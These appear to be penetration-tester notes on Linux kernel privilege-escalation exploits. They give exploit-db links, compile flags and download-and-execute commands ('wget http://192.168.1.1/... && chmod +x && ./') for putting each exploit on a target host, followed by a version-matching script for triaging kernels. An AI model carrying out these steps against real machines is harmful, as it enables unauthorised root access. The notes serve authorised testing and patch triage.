# Kernel Exploits

### Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip\_append\_data()' Ring0 Privilege Escalation (1)

<https://www.exploit-db.com/exploits/9542>

If the target machine is 32-bit, cross-compile the exploit on our own machine with `-m32` (`-Wl,--hash-style=both` emits both `.hash` and `.gnu.hash` sections so the binary still loads on older glibc), then fetch it onto the target:

```
$ gcc -m32 -Wl,--hash-style=both -o 9542 9542.c

$ wget http://192.168.1.1/9542 && chmod +x 9542 && ./9542
```

### Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock\_sendpage()' Local Privilege Escalation

<https://www.exploit-db.com/exploits/9545>

If this doesn't work, change the protocol family (module) used in the `socket()` call. Comment 24 of the Red Hat bug report lists the modules to try: <https://bugzilla.redhat.com/show_bug.cgi?id=516949#c24>

Line 349: `if ((out_fd = socket({MODULENAME}, SOCK_DGRAM, 0)) == -1)`

```
gcc -m32 -Wl,--hash-style=both 9545.c -o 9545

wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
```

Header comment from linux-sendpage.c (the same exploit as 9545):

```
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
```

### Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)

exploits/linux/local/35161.c

<https://www.exploit-db.com/raw/35161>

```
mkdir /tmp/poc
cd /tmp/poc
wget http://192.168.1.1/35161.c
gcc 35161.c -o poc
./poc
```

### Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

<https://www.exploit-db.com/exploits/44298>

```
# on our machine
cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc 44298.c -o exploit.php

# on the target
wget http://192.168.1.1:8080/exploit.php
mv exploit.php exploit
chmod +x exploit
./exploit
```

### Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

<https://www.exploit-db.com/exploits/45010>

```
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
```

### Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

<https://www.exploit-db.com/exploits/40839>

<https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c>

```
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
```
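The headings above each name a kernel version range. When triaging a fleet (or deciding whether a host found during an engagement is even worth testing), the first question is whether `uname -r` falls inside one of those ranges. The script below is an added example, not part of the original notes or of any exploit: it compares dotted kernel release strings and reports which entries on this page claim to cover a given release. The bounds are the ones quoted in the headings and in the linux-sendpage.c header; for the two entries that state only an upper bound ("< 4.4.0-116", "< 4.13.9") it assumes the lower bound is the same major version, which is an assumption of this example, not something the page states.

```shell
#!/bin/sh
# Added example (not from the original notes): match a kernel release string
# against the version ranges quoted on this page.

# vercmp A B -> prints -1, 0 or 1 for A<B, A=B, A>B.
# The first "-" is treated as another dotted component (so 4.4.0-115 < 4.4.0-116)
# and any textual suffix such as "-generic" or ".el5" is dropped.
vercmp() {
    a=$(printf '%s' "$1" | sed 's/-/./; s/[^0-9.].*//')
    b=$(printf '%s' "$2" | sed 's/-/./; s/[^0-9.].*//')
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        # drop the leading component; missing components compare as 0
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
        x=${x:-0}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then echo -1; return; fi
        if [ "$x" -gt "$y" ]; then echo 1; return; fi
    done
    echo 0
}

# in_range V LOW HIGH -> true when LOW <= V < HIGH (HIGH is the first fixed
# release, which is how the headings write "< X").
in_range() {
    [ "$(vercmp "$1" "$2")" -ge 0 ] && [ "$(vercmp "$1" "$3")" -lt 0 ]
}

# kernel_matches RELEASE -> prints one line per entry on this page whose stated
# range covers RELEASE. Lower bounds of "4" for 44298 and 45010 are an assumption.
kernel_matches() {
    r=$1
    in_range "$r" 2.6    2.6.19    && echo "9542  ip_append_data()"
    in_range "$r" 2.4.4  2.4.37.5  && echo "9545  sock_sendpage()"
    in_range "$r" 2.6    2.6.30.5  && echo "9545  sock_sendpage()"
    in_range "$r" 2.6.39 3.2.2     && echo "35161 Mempodipper"
    in_range "$r" 4      4.4.0-116 && echo "44298 Ubuntu 16.04.4 LPE"
    in_range "$r" 4      4.13.9    && echo "45010 CVE-2017-16995"
    in_range "$r" 2.6.22 3.9       && echo "40839 Dirty COW"
    return 0
}

# Usage: ./kernel-ranges.sh [release]; defaults to the running kernel.
kernel_matches "${1:-$(uname -r)}"
```

The script only reads the release string; it does not compile or run anything. Treat a match as "patch this host" rather than proof of exploitability: distributions backport fixes without changing the version number, so `uname -r` alone over-reports on RHEL/CentOS style kernels (2.6.18-8.el5 matches two entries above but may already carry the fix).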
